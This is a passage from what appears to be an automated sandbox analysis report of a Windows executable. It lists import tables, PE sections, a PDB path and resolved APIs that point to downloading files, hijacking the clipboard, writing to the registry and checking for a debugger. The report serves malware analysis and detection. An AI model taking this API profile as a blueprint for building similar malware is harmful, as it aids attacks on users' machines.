  962. "address": "0x42b018"
  963. },
  964. {
  965. "name": "WaitNamedPipeA",
  966. "address": "0x42b01c"
  967. },
  968. {
  969. "name": "WaitForSingleObject",
  970. "address": "0x42b020"
  971. },
  972. {
  973. "name": "SetTapeParameters",
  974. "address": "0x42b024"
  975. },
  976. {
  977. "name": "GetModuleHandleW",
  978. "address": "0x42b028"
  979. },
  980. {
  981. "name": "GetTickCount",
  982. "address": "0x42b02c"
  983. },
  984. {
  985. "name": "ExpandEnvironmentStringsA",
  986. "address": "0x42b030"
  987. },
  988. {
  989. "name": "ReadConsoleW",
  990. "address": "0x42b034"
  991. },
  992. {
  993. "name": "FormatMessageA",
  994. "address": "0x42b038"
  995. },
  996. {
  997. "name": "EnumTimeFormatsA",
  998. "address": "0x42b03c"
  999. },
  1000. {
  1001. "name": "EnumTimeFormatsW",
  1002. "address": "0x42b040"
  1003. },
  1004. {
  1005. "name": "GlobalAlloc",
  1006. "address": "0x42b044"
  1007. },
  1008. {
  1009. "name": "GetFirmwareEnvironmentVariableA",
  1010. "address": "0x42b048"
  1011. },
  1012. {
  1013. "name": "GetStringTypeExW",
  1014. "address": "0x42b04c"
  1015. },
  1016. {
  1017. "name": "IsProcessorFeaturePresent",
  1018. "address": "0x42b050"
  1019. },
  1020. {
  1021. "name": "GetVolumePathNamesForVolumeNameW",
  1022. "address": "0x42b054"
  1023. },
  1024. {
  1025. "name": "ReplaceFileW",
  1026. "address": "0x42b058"
  1027. },
  1028. {
  1029. "name": "GetSystemDirectoryA",
  1030. "address": "0x42b05c"
  1031. },
  1032. {
  1033. "name": "CreateMailslotW",
  1034. "address": "0x42b060"
  1035. },
  1036. {
  1037. "name": "WritePrivateProfileStringW",
  1038. "address": "0x42b064"
  1039. },
  1040. {
  1041. "name": "EnumSystemLocalesA",
  1042. "address": "0x42b068"
  1043. },
  1044. {
  1045. "name": "VerifyVersionInfoW",
  1046. "address": "0x42b06c"
  1047. },
  1048. {
  1049. "name": "GetProfileIntA",
  1050. "address": "0x42b070"
  1051. },
  1052. {
  1053. "name": "Module32First",
  1054. "address": "0x42b074"
  1055. },
  1056. {
  1057. "name": "GetProcAddress",
  1058. "address": "0x42b078"
  1059. },
  1060. {
  1061. "name": "GetLongPathNameA",
  1062. "address": "0x42b07c"
  1063. },
  1064. {
  1065. "name": "DefineDosDeviceW",
  1066. "address": "0x42b080"
  1067. },
  1068. {
  1069. "name": "HeapUnlock",
  1070. "address": "0x42b084"
  1071. },
  1072. {
  1073. "name": "MoveFileW",
  1074. "address": "0x42b088"
  1075. },
  1076. {
  1077. "name": "GetAtomNameA",
  1078. "address": "0x42b08c"
  1079. },
  1080. {
  1081. "name": "LocalAlloc",
  1082. "address": "0x42b090"
  1083. },
  1084. {
  1085. "name": "FindFirstVolumeMountPointW",
  1086. "address": "0x42b094"
  1087. },
  1088. {
  1089. "name": "OpenEventA",
  1090. "address": "0x42b098"
  1091. },
  1092. {
  1093. "name": "GetProfileStringA",
  1094. "address": "0x42b09c"
  1095. },
  1096. {
  1097. "name": "OpenJobObjectW",
  1098. "address": "0x42b0a0"
  1099. },
  1100. {
  1101. "name": "GetThreadPriority",
  1102. "address": "0x42b0a4"
  1103. },
  1104. {
  1105. "name": "FindFirstChangeNotificationA",
  1106. "address": "0x42b0a8"
  1107. },
  1108. {
  1109. "name": "WriteProfileStringW",
  1110. "address": "0x42b0ac"
  1111. },
  1112. {
  1113. "name": "MoveFileWithProgressW",
  1114. "address": "0x42b0b0"
  1115. },
  1116. {
  1117. "name": "GetConsoleProcessList",
  1118. "address": "0x42b0b4"
  1119. },
  1120. {
  1121. "name": "ExpandEnvironmentStringsW",
  1122. "address": "0x42b0b8"
  1123. },
  1124. {
  1125. "name": "CreateFileW",
  1126. "address": "0x42b0bc"
  1127. },
  1128. {
  1129. "name": "FlushFileBuffers",
  1130. "address": "0x42b0c0"
  1131. },
  1132. {
  1133. "name": "GetStringTypeW",
  1134. "address": "0x42b0c4"
  1135. },
  1136. {
  1137. "name": "WriteConsoleW",
  1138. "address": "0x42b0c8"
  1139. },
  1140. {
  1141. "name": "SetStdHandle",
  1142. "address": "0x42b0cc"
  1143. },
  1144. {
  1145. "name": "OutputDebugStringW",
  1146. "address": "0x42b0d0"
  1147. },
  1148. {
  1149. "name": "EnumSystemLocalesW",
  1150. "address": "0x42b0d4"
  1151. },
  1152. {
  1153. "name": "EncodePointer",
  1154. "address": "0x42b0d8"
  1155. },
  1156. {
  1157. "name": "DecodePointer",
  1158. "address": "0x42b0dc"
  1159. },
  1160. {
  1161. "name": "GetCommandLineA",
  1162. "address": "0x42b0e0"
  1163. },
  1164. {
  1165. "name": "RaiseException",
  1166. "address": "0x42b0e4"
  1167. },
  1168. {
  1169. "name": "RtlUnwind",
  1170. "address": "0x42b0e8"
  1171. },
  1172. {
  1173. "name": "IsDebuggerPresent",
  1174. "address": "0x42b0ec"
  1175. },
  1176. {
  1177. "name": "GetLastError",
  1178. "address": "0x42b0f0"
  1179. },
  1180. {
  1181. "name": "ExitProcess",
  1182. "address": "0x42b0f4"
  1183. },
  1184. {
  1185. "name": "GetModuleHandleExW",
  1186. "address": "0x42b0f8"
  1187. },
  1188. {
  1189. "name": "AreFileApisANSI",
  1190. "address": "0x42b0fc"
  1191. },
  1192. {
  1193. "name": "MultiByteToWideChar",
  1194. "address": "0x42b100"
  1195. },
  1196. {
  1197. "name": "WideCharToMultiByte",
  1198. "address": "0x42b104"
  1199. },
  1200. {
  1201. "name": "HeapSize",
  1202. "address": "0x42b108"
  1203. },
  1204. {
  1205. "name": "HeapFree",
  1206. "address": "0x42b10c"
  1207. },
  1208. {
  1209. "name": "HeapAlloc",
  1210. "address": "0x42b110"
  1211. },
  1212. {
  1213. "name": "SetLastError",
  1214. "address": "0x42b114"
  1215. },
  1216. {
  1217. "name": "GetCurrentThread",
  1218. "address": "0x42b118"
  1219. },
  1220. {
  1221. "name": "GetCurrentThreadId",
  1222. "address": "0x42b11c"
  1223. },
  1224. {
  1225. "name": "GetProcessHeap",
  1226. "address": "0x42b120"
  1227. },
  1228. {
  1229. "name": "GetStdHandle",
  1230. "address": "0x42b124"
  1231. },
  1232. {
  1233. "name": "GetFileType",
  1234. "address": "0x42b128"
  1235. },
  1236. {
  1237. "name": "DeleteCriticalSection",
  1238. "address": "0x42b12c"
  1239. },
  1240. {
  1241. "name": "GetStartupInfoW",
  1242. "address": "0x42b130"
  1243. },
  1244. {
  1245. "name": "GetModuleFileNameA",
  1246. "address": "0x42b134"
  1247. },
  1248. {
  1249. "name": "WriteFile",
  1250. "address": "0x42b138"
  1251. },
  1252. {
  1253. "name": "GetModuleFileNameW",
  1254. "address": "0x42b13c"
  1255. },
  1256. {
  1257. "name": "QueryPerformanceCounter",
  1258. "address": "0x42b140"
  1259. },
  1260. {
  1261. "name": "GetCurrentProcessId",
  1262. "address": "0x42b144"
  1263. },
  1264. {
  1265. "name": "GetSystemTimeAsFileTime",
  1266. "address": "0x42b148"
  1267. },
  1268. {
  1269. "name": "GetEnvironmentStringsW",
  1270. "address": "0x42b14c"
  1271. },
  1272. {
  1273. "name": "FreeEnvironmentStringsW",
  1274. "address": "0x42b150"
  1275. },
  1276. {
  1277. "name": "UnhandledExceptionFilter",
  1278. "address": "0x42b154"
  1279. },
  1280. {
  1281. "name": "SetUnhandledExceptionFilter",
  1282. "address": "0x42b158"
  1283. },
  1284. {
  1285. "name": "InitializeCriticalSectionAndSpinCount",
  1286. "address": "0x42b15c"
  1287. },
  1288. {
  1289. "name": "CreateEventW",
  1290. "address": "0x42b160"
  1291. },
  1292. {
  1293. "name": "Sleep",
  1294. "address": "0x42b164"
  1295. },
  1296. {
  1297. "name": "GetCurrentProcess",
  1298. "address": "0x42b168"
  1299. },
  1300. {
  1301. "name": "TerminateProcess",
  1302. "address": "0x42b16c"
  1303. },
  1304. {
  1305. "name": "TlsAlloc",
  1306. "address": "0x42b170"
  1307. },
  1308. {
  1309. "name": "TlsGetValue",
  1310. "address": "0x42b174"
  1311. },
  1312. {
  1313. "name": "TlsSetValue",
  1314. "address": "0x42b178"
  1315. },
  1316. {
  1317. "name": "TlsFree",
  1318. "address": "0x42b17c"
  1319. },
  1320. {
  1321. "name": "CreateSemaphoreW",
  1322. "address": "0x42b180"
  1323. },
  1324. {
  1325. "name": "EnterCriticalSection",
  1326. "address": "0x42b184"
  1327. },
  1328. {
  1329. "name": "LeaveCriticalSection",
  1330. "address": "0x42b188"
  1331. },
  1332. {
  1333. "name": "GetConsoleCP",
  1334. "address": "0x42b18c"
  1335. },
  1336. {
  1337. "name": "GetConsoleMode",
  1338. "address": "0x42b190"
  1339. },
  1340. {
  1341. "name": "SetFilePointerEx",
  1342. "address": "0x42b194"
  1343. },
  1344. {
  1345. "name": "IsValidCodePage",
  1346. "address": "0x42b198"
  1347. },
  1348. {
  1349. "name": "GetACP",
  1350. "address": "0x42b19c"
  1351. },
  1352. {
  1353. "name": "GetOEMCP",
  1354. "address": "0x42b1a0"
  1355. },
  1356. {
  1357. "name": "GetCPInfo",
  1358. "address": "0x42b1a4"
  1359. },
  1360. {
  1361. "name": "FatalAppExitA",
  1362. "address": "0x42b1a8"
  1363. },
  1364. {
  1365. "name": "SetConsoleCtrlHandler",
  1366. "address": "0x42b1ac"
  1367. },
  1368. {
  1369. "name": "FreeLibrary",
  1370. "address": "0x42b1b0"
  1371. },
  1372. {
  1373. "name": "LoadLibraryExW",
  1374. "address": "0x42b1b4"
  1375. },
  1376. {
  1377. "name": "GetDateFormatW",
  1378. "address": "0x42b1b8"
  1379. },
  1380. {
  1381. "name": "GetTimeFormatW",
  1382. "address": "0x42b1bc"
  1383. },
  1384. {
  1385. "name": "CompareStringW",
  1386. "address": "0x42b1c0"
  1387. },
  1388. {
  1389. "name": "LCMapStringW",
  1390. "address": "0x42b1c4"
  1391. },
  1392. {
  1393. "name": "GetLocaleInfoW",
  1394. "address": "0x42b1c8"
  1395. },
  1396. {
  1397. "name": "IsValidLocale",
  1398. "address": "0x42b1cc"
  1399. },
  1400. {
  1401. "name": "GetUserDefaultLCID",
  1402. "address": "0x42b1d0"
  1403. },
  1404. {
  1405. "name": "CloseHandle",
  1406. "address": "0x42b1d4"
  1407. }
  1408. ],
  1409. "dll": "KERNEL32.dll"
  1410. },
  1411. {
  1412. "imports": [
  1413. {
  1414. "name": "GetMenuBarInfo",
  1415. "address": "0x42b1dc"
  1416. },
  1417. {
  1418. "name": "DrawTextExA",
  1419. "address": "0x42b1e0"
  1420. },
  1421. {
  1422. "name": "SetWindowsHookA",
  1423. "address": "0x42b1e4"
  1424. },
  1425. {
  1426. "name": "DestroyIcon",
  1427. "address": "0x42b1e8"
  1428. },
  1429. {
  1430. "name": "GetOpenClipboardWindow",
  1431. "address": "0x42b1ec"
  1432. },
  1433. {
  1434. "name": "ClientToScreen",
  1435. "address": "0x42b1f0"
  1436. }
  1437. ],
  1438. "dll": "USER32.dll"
  1439. }
  1440. ],
  1441. "digital_signers": null,
  1442. "exported_dll_name": null,
  1443. "actual_checksum": "0x0005251b",
  1444. "overlay": null,
  1445. "imagebase": "0x00400000",
  1446. "reported_checksum": "0x0005251b",
  1447. "icon_hash": null,
  1448. "entrypoint": "0x00407b76",
  1449. "timestamp": "2018-07-23 08:18:02",
  1450. "osversion": "5.1",
  1451. "sections": [
  1452. {
  1453. "name": ".text",
  1454. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
  1455. "virtual_address": "0x00001000",
  1456. "size_of_data": "0x00029600",
  1457. "entropy": "6.72",
  1458. "raw_address": "0x00000400",
  1459. "virtual_size": "0x000294dd",
  1460. "characteristics_raw": "0x60000020"
  1461. },
  1462. {
  1463. "name": ".rdata",
  1464. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
  1465. "virtual_address": "0x0002b000",
  1466. "size_of_data": "0x00013200",
  1467. "entropy": "6.07",
  1468. "raw_address": "0x00029a00",
  1469. "virtual_size": "0x000130b2",
  1470. "characteristics_raw": "0x40000040"
  1471. },
  1472. {
  1473. "name": ".data",
  1474. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1475. "virtual_address": "0x0003f000",
  1476. "size_of_data": "0x00002200",
  1477. "entropy": "2.74",
  1478. "raw_address": "0x0003cc00",
  1479. "virtual_size": "0x00014cc8",
  1480. "characteristics_raw": "0xc0000040"
  1481. },
  1482. {
  1483. "name": ".rsrc",
  1484. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
  1485. "virtual_address": "0x00054000",
  1486. "size_of_data": "0x00006400",
  1487. "entropy": "6.31",
  1488. "raw_address": "0x0003ee00",
  1489. "virtual_size": "0x000063b0",
  1490. "characteristics_raw": "0x40000040"
  1491. },
  1492. {
  1493. "name": ".reloc",
  1494. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
  1495. "virtual_address": "0x0005b000",
  1496. "size_of_data": "0x00002400",
  1497. "entropy": "6.55",
  1498. "raw_address": "0x00045200",
  1499. "virtual_size": "0x000022a0",
  1500. "characteristics_raw": "0x42000040"
  1501. }
  1502. ],
  1503. "resources": [],
  1504. "dirents": [
  1505. {
  1506. "virtual_address": "0x00000000",
  1507. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
  1508. "size": "0x00000000"
  1509. },
  1510. {
  1511. "virtual_address": "0x0003d4fc",
  1512. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
  1513. "size": "0x0000003c"
  1514. },
  1515. {
  1516. "virtual_address": "0x00054000",
  1517. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
  1518. "size": "0x000063b0"
  1519. },
  1520. {
  1521. "virtual_address": "0x00000000",
  1522. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
  1523. "size": "0x00000000"
  1524. },
  1525. {
  1526. "virtual_address": "0x00000000",
  1527. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
  1528. "size": "0x00000000"
  1529. },
  1530. {
  1531. "virtual_address": "0x0005b000",
  1532. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
  1533. "size": "0x000022a0"
  1534. },
  1535. {
  1536. "virtual_address": "0x0002b250",
  1537. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
  1538. "size": "0x00000038"
  1539. },
  1540. {
  1541. "virtual_address": "0x00000000",
  1542. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
  1543. "size": "0x00000000"
  1544. },
  1545. {
  1546. "virtual_address": "0x00000000",
  1547. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
  1548. "size": "0x00000000"
  1549. },
  1550. {
  1551. "virtual_address": "0x00000000",
  1552. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
  1553. "size": "0x00000000"
  1554. },
  1555. {
  1556. "virtual_address": "0x00000000",
  1557. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
  1558. "size": "0x00000000"
  1559. },
  1560. {
  1561. "virtual_address": "0x00000000",
  1562. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
  1563. "size": "0x00000000"
  1564. },
  1565. {
  1566. "virtual_address": "0x0002b000",
  1567. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
  1568. "size": "0x000001f8"
  1569. },
  1570. {
  1571. "virtual_address": "0x00000000",
  1572. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
  1573. "size": "0x00000000"
  1574. },
  1575. {
  1576. "virtual_address": "0x00000000",
  1577. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
  1578. "size": "0x00000000"
  1579. },
  1580. {
  1581. "virtual_address": "0x00000000",
  1582. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
  1583. "size": "0x00000000"
  1584. }
  1585. ],
  1586. "exports": [],
  1587. "guest_signers": {},
  1588. "imphash": "1f9917f590ed0711a560b3a3a279ed67",
  1589. "icon_fuzzy": null,
  1590. "icon": null,
  1591. "pdbpath": "C:\\madakonezanudano69\\widagemokiredugic-difulib-fu.pdb\\x00in\\kolanu.pdb\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa8\\x00\\x00\\x00\\xa7",
  1592. "imported_dll_count": 2,
  1593. "versioninfo": []
  1594. }
  1595. }
  1596.  
  1597. [*] Resolved APIs: [
  1598. "kernel32.dll.FlsAlloc",
  1599. "kernel32.dll.FlsFree",
  1600. "kernel32.dll.FlsGetValue",
  1601. "kernel32.dll.FlsSetValue",
  1602. "kernel32.dll.InitializeCriticalSectionEx",
  1603. "kernel32.dll.CreateEventExW",
  1604. "kernel32.dll.CreateSemaphoreExW",
  1605. "kernel32.dll.SetThreadStackGuarantee",
  1606. "kernel32.dll.CreateThreadpoolTimer",
  1607. "kernel32.dll.SetThreadpoolTimer",
  1608. "kernel32.dll.WaitForThreadpoolTimerCallbacks",
  1609. "kernel32.dll.CloseThreadpoolTimer",
  1610. "kernel32.dll.CreateThreadpoolWait",
  1611. "kernel32.dll.SetThreadpoolWait",
  1612. "kernel32.dll.CloseThreadpoolWait",
  1613. "kernel32.dll.FlushProcessWriteBuffers",
  1614. "kernel32.dll.FreeLibraryWhenCallbackReturns",
  1615. "kernel32.dll.GetCurrentProcessorNumber",
  1616. "kernel32.dll.GetLogicalProcessorInformation",
  1617. "kernel32.dll.CreateSymbolicLinkW",
  1618. "kernel32.dll.EnumSystemLocalesEx",
  1619. "kernel32.dll.CompareStringEx",
  1620. "kernel32.dll.GetDateFormatEx",
  1621. "kernel32.dll.GetLocaleInfoEx",
  1622. "kernel32.dll.GetTimeFormatEx",
  1623. "kernel32.dll.GetUserDefaultLocaleName",
  1624. "kernel32.dll.IsValidLocaleName",
  1625. "kernel32.dll.LCMapStringEx",
  1626. "kernel32.dll.GetTickCount64",
  1627. "kernel32.dll.VirtualProtect",
  1628. "kernel32.dll.LoadLibraryA",
  1629. "kernel32.dll.VirtualAlloc",
  1630. "kernel32.dll.VirtualFree",
  1631. "kernel32.dll.GetVersionExA",
  1632. "kernel32.dll.TerminateProcess",
  1633. "kernel32.dll.ExitProcess",
  1634. "kernel32.dll.SetErrorMode",
  1635. "msvcrt.dll._controlfp",
  1636. "msvcrt.dll._except_handler3",
  1637. "msvcrt.dll.__set_app_type",
  1638. "msvcrt.dll.__p__fmode",
  1639. "msvcrt.dll.isalpha",
  1640. "msvcrt.dll.__p__commode",
  1641. "msvcrt.dll._adjust_fdiv",
  1642. "msvcrt.dll.__setusermatherr",
  1643. "msvcrt.dll._initterm",
  1644. "msvcrt.dll.__getmainargs",
  1645. "msvcrt.dll._acmdln",
  1646. "msvcrt.dll.exit",
  1647. "msvcrt.dll._XcptFilter",
  1648. "msvcrt.dll._exit",
  1649. "msvcrt.dll._snprintf",
  1650. "msvcrt.dll.fclose",
  1651. "msvcrt.dll.fseek",
  1652. "msvcrt.dll.ftell",
  1653. "msvcrt.dll.wcsstr",
  1654. "msvcrt.dll._wfopen",
  1655. "msvcrt.dll.srand",
  1656. "msvcrt.dll.rand",
  1657. "msvcrt.dll._snwprintf",
  1658. "msvcrt.dll.isdigit",
  1659. "msvcrt.dll.memset",
  1660. "msvcrt.dll.memcpy",
  1661. "wininet.dll.InternetOpenUrlA",
  1662. "wininet.dll.HttpQueryInfoA",
  1663. "wininet.dll.InternetCloseHandle",
  1664. "wininet.dll.InternetReadFile",
  1665. "wininet.dll.InternetOpenUrlW",
  1666. "wininet.dll.InternetOpenW",
  1667. "wininet.dll.InternetOpenA",
  1668. "urlmon.dll.URLDownloadToFileW",
  1669. "shlwapi.dll.PathFileExistsW",
  1670. "shlwapi.dll.PathFindFileNameA",
  1671. "shlwapi.dll.PathFindFileNameW",
  1672. "kernel32.dll.GetModuleFileNameW",
  1673. "kernel32.dll.GetFileAttributesW",
  1674. "kernel32.dll.CopyFileW",
  1675. "kernel32.dll.CreateDirectoryW",
  1676. "kernel32.dll.GetLogicalDriveStringsW",
  1677. "kernel32.dll.GetDriveTypeW",
  1678. "kernel32.dll.FindFirstFileW",
  1679. "kernel32.dll.ExpandEnvironmentStringsW",
  1680. "kernel32.dll.DeleteFileW",
  1681. "kernel32.dll.CloseHandle",
  1682. "kernel32.dll.FindClose",
  1683. "kernel32.dll.WriteFile",
  1684. "kernel32.dll.GetTickCount",
  1685. "kernel32.dll.GlobalUnlock",
  1686. "kernel32.dll.Sleep",
  1687. "kernel32.dll.GlobalAlloc",
  1688. "kernel32.dll.GlobalLock",
  1689. "kernel32.dll.IsDebuggerPresent",
  1690. "kernel32.dll.GetModuleHandleA",
  1691. "kernel32.dll.Process32First",
  1692. "kernel32.dll.Process32Next",
  1693. "kernel32.dll.FindNextFileW",
  1694. "kernel32.dll.SetFileAttributesW",
  1695. "kernel32.dll.GetVolumeInformationW",
  1696. "kernel32.dll.CreateFileW",
  1697. "kernel32.dll.ExitThread",
  1698. "kernel32.dll.GetStartupInfoA",
  1699. "kernel32.dll.CreateThread",
  1700. "kernel32.dll.CreateMutexA",
  1701. "kernel32.dll.GetLastError",
  1702. "kernel32.dll.CreateToolhelp32Snapshot",
  1703. "kernel32.dll.CreateProcessW",
  1704. "user32.dll.SetClipboardData",
  1705. "user32.dll.OpenClipboard",
  1706. "user32.dll.EmptyClipboard",
  1707. "user32.dll.GetClipboardData",
  1708. "user32.dll.CloseClipboard",
  1709. "user32.dll.CharUpperA",
  1710. "advapi32.dll.RegCreateKeyExA",
  1711. "advapi32.dll.RegCloseKey",
  1712. "advapi32.dll.RegSetValueExW",
  1713. "advapi32.dll.RegOpenKeyExW",
  1714. "shell32.dll.ShellExecuteW",
  1715. "ole32.dll.CoInitialize",
  1716. "ole32.dll.CoCreateInstance",
  1717. "msvcr100.dll.atexit",
  1718. "rasapi32.dll.RasConnectionNotificationW",
  1719. "sechost.dll.OpenServiceA",
  1720. "sechost.dll.NotifyServiceStatusChangeA",
  1721. "cryptbase.dll.SystemFunction036"
  1722. ]
  1723.  
  1724. [*] Static Analysis: {
  1725. "pe": {
  1726. "peid_signatures": null,
  1727. "imports": [
  1728. {
  1729. "imports": [
  1730. {
  1731. "name": "FillConsoleOutputCharacterA",
  1732. "address": "0x42b000"
  1733. },
  1734. {
  1735. "name": "HeapReAlloc",
  1736. "address": "0x42b004"
  1737. },
  1738. {
  1739. "name": "GetNativeSystemInfo",
  1740. "address": "0x42b008"
  1741. },
  1742. {
  1743. "name": "SetLocaleInfoA",
  1744. "address": "0x42b00c"
  1745. },
  1746. {
  1747. "name": "WritePrivateProfileStructA",
  1748. "address": "0x42b010"
  1749. },
  1750. {
  1751. "name": "GetDefaultCommConfigW",
  1752. "address": "0x42b014"
  1753. },
  1754. {
  1755. "name": "FindResourceW",
  1756. "address": "0x42b018"
  1757. },
  1758. {
  1759. "name": "WaitNamedPipeA",
  1760. "address": "0x42b01c"
  1761. },
  1762. {
  1763. "name": "WaitForSingleObject",
  1764. "address": "0x42b020"
  1765. },
  1766. {
  1767. "name": "SetTapeParameters",
  1768. "address": "0x42b024"
  1769. },
  1770. {
  1771. "name": "GetModuleHandleW",
  1772. "address": "0x42b028"
  1773. },
  1774. {
  1775. "name": "GetTickCount",
  1776. "address": "0x42b02c"
  1777. },
  1778. {
  1779. "name": "ExpandEnvironmentStringsA",
  1780. "address": "0x42b030"
  1781. },
  1782. {
  1783. "name": "ReadConsoleW",
  1784. "address": "0x42b034"
  1785. },
  1786. {
  1787. "name": "FormatMessageA",
  1788. "address": "0x42b038"
  1789. },
  1790. {
  1791. "name": "EnumTimeFormatsA",
  1792. "address": "0x42b03c"
  1793. },
  1794. {
  1795. "name": "EnumTimeFormatsW",
  1796. "address": "0x42b040"
  1797. },
  1798. {
  1799. "name": "GlobalAlloc",
  1800. "address": "0x42b044"
  1801. },
  1802. {
  1803. "name": "GetFirmwareEnvironmentVariableA",
  1804. "address": "0x42b048"
  1805. },
  1806. {
  1807. "name": "GetStringTypeExW",
  1808. "address": "0x42b04c"
  1809. },
  1810. {
  1811. "name": "IsProcessorFeaturePresent",
  1812. "address": "0x42b050"
  1813. },
  1814. {
  1815. "name": "GetVolumePathNamesForVolumeNameW",
  1816. "address": "0x42b054"
  1817. },
  1818. {
  1819. "name": "ReplaceFileW",
  1820. "address": "0x42b058"
  1821. },
  1822. {
  1823. "name": "GetSystemDirectoryA",
  1824. "address": "0x42b05c"
  1825. },
  1826. {
  1827. "name": "CreateMailslotW",
  1828. "address": "0x42b060"
  1829. },
  1830. {
  1831. "name": "WritePrivateProfileStringW",
  1832. "address": "0x42b064"
  1833. },
  1834. {
  1835. "name": "EnumSystemLocalesA",
  1836. "address": "0x42b068"
  1837. },
  1838. {
  1839. "name": "VerifyVersionInfoW",
  1840. "address": "0x42b06c"
  1841. },
  1842. {
  1843. "name": "GetProfileIntA",
  1844. "address": "0x42b070"
  1845. },
  1846. {
  1847. "name": "Module32First",
  1848. "address": "0x42b074"
  1849. },
  1850. {
  1851. "name": "GetProcAddress",
  1852. "address": "0x42b078"
  1853. },
  1854. {
  1855. "name": "GetLongPathNameA",
  1856. "address": "0x42b07c"
  1857. },
  1858. {
  1859. "name": "DefineDosDeviceW",
  1860. "address": "0x42b080"
  1861. },
  1862. {
  1863. "name": "HeapUnlock",
  1864. "address": "0x42b084"
  1865. },
  1866. {
  1867. "name": "MoveFileW",
  1868. "address": "0x42b088"
  1869. },
  1870. {
  1871. "name": "GetAtomNameA",
  1872. "address": "0x42b08c"
  1873. },
  1874. {
  1875. "name": "LocalAlloc",
  1876. "address": "0x42b090"
  1877. },
  1878. {
  1879. "name": "FindFirstVolumeMountPointW",
  1880. "address": "0x42b094"
  1881. },
  1882. {
  1883. "name": "OpenEventA",
  1884. "address": "0x42b098"
  1885. },
  1886. {
  1887. "name": "GetProfileStringA",
  1888. "address": "0x42b09c"
  1889. },
  1890. {
  1891. "name": "OpenJobObjectW",
  1892. "address": "0x42b0a0"
  1893. },
  1894. {
  1895. "name": "GetThreadPriority",
  1896. "address": "0x42b0a4"
  1897. },
  1898. {
  1899. "name": "FindFirstChangeNotificationA",
  1900. "address": "0x42b0a8"
  1901. },
  1902. {
  1903. "name": "WriteProfileStringW",
  1904. "address": "0x42b0ac"
  1905. },
  1906. {
  1907. "name": "MoveFileWithProgressW",
  1908. "address": "0x42b0b0"
  1909. },
  1910. {
  1911. "name": "GetConsoleProcessList",
  1912. "address": "0x42b0b4"
  1913. },
  1914. {
  1915. "name": "ExpandEnvironmentStringsW",
  1916. "address": "0x42b0b8"
  1917. },
  1918. {
  1919. "name": "CreateFileW",
  1920. "address": "0x42b0bc"
  1921. },
  1922. {
  1923. "name": "FlushFileBuffers",
  1924. "address": "0x42b0c0"
  1925. },
  1926. {
  1927. "name": "GetStringTypeW",
  1928. "address": "0x42b0c4"
  1929. },
  1930. {
  1931. "name": "WriteConsoleW",
  1932. "address": "0x42b0c8"
  1933. },
  1934. {
  1935. "name": "SetStdHandle",
  1936. "address": "0x42b0cc"
  1937. },
  1938. {
  1939. "name": "OutputDebugStringW",
  1940. "address": "0x42b0d0"
  1941. },
  1942. {
  1943. "name": "EnumSystemLocalesW",
  1944. "address": "0x42b0d4"
  1945. },
  1946. {
  1947. "name": "EncodePointer",
  1948. "address": "0x42b0d8"
  1949. },
  1950. {
  1951. "name": "DecodePointer",
  1952. "address": "0x42b0dc"
  1953. },
  1954. {
  1955. "name": "GetCommandLineA",
  1956. "address": "0x42b0e0"
  1957. },
  1958. {
  1959. "name": "RaiseException",
  1960. "address": "0x42b0e4"
  1961. },
  1962. {
  1963. "name": "RtlUnwind",
  1964. "address": "0x42b0e8"
  1965. },
  1966. {
  1967. "name": "IsDebuggerPresent",
  1968. "address": "0x42b0ec"
  1969. },
  1970. {
  1971. "name": "GetLastError",
  1972. "address": "0x42b0f0"
  1973. },
  1974. {
  1975. "name": "ExitProcess",
  1976. "address": "0x42b0f4"
  1977. },
  1978. {
  1979. "name": "GetModuleHandleExW",
  1980. "address": "0x42b0f8"
  1981. },
  1982. {
  1983. "name": "AreFileApisANSI",
  1984. "address": "0x42b0fc"
  1985. },
  1986. {
  1987. "name": "MultiByteToWideChar",
  1988. "address": "0x42b100"
  1989. },
  1990. {
  1991. "name": "WideCharToMultiByte",
  1992. "address": "0x42b104"
  1993. },
  1994. {
  1995. "name": "HeapSize",
  1996. "address": "0x42b108"
  1997. },
  1998. {
  1999. "name": "HeapFree",
  2000. "address": "0x42b10c"
  2001. },
  2002. {
  2003. "name": "HeapAlloc",
  2004. "address": "0x42b110"
  2005. },
  2006. {
  2007. "name": "SetLastError",
  2008. "address": "0x42b114"
  2009. },
  2010. {
  2011. "name": "GetCurrentThread",
  2012. "address": "0x42b118"
  2013. },
  2014. {
  2015. "name": "GetCurrentThreadId",
  2016. "address": "0x42b11c"
  2017. },
  2018. {
  2019. "name": "GetProcessHeap",
  2020. "address": "0x42b120"
  2021. },
  2022. {
  2023. "name": "GetStdHandle",
  2024. "address": "0x42b124"
  2025. },
  2026. {
  2027. "name": "GetFileType",
  2028. "address": "0x42b128"
  2029. },
  2030. {
  2031. "name": "DeleteCriticalSection",
  2032. "address": "0x42b12c"
  2033. },
  2034. {
  2035. "name": "GetStartupInfoW",
  2036. "address": "0x42b130"
  2037. },
  2038. {
  2039. "name": "GetModuleFileNameA",
  2040. "address": "0x42b134"
  2041. },
  2042. {
  2043. "name": "WriteFile",
  2044. "address": "0x42b138"
  2045. },
  2046. {
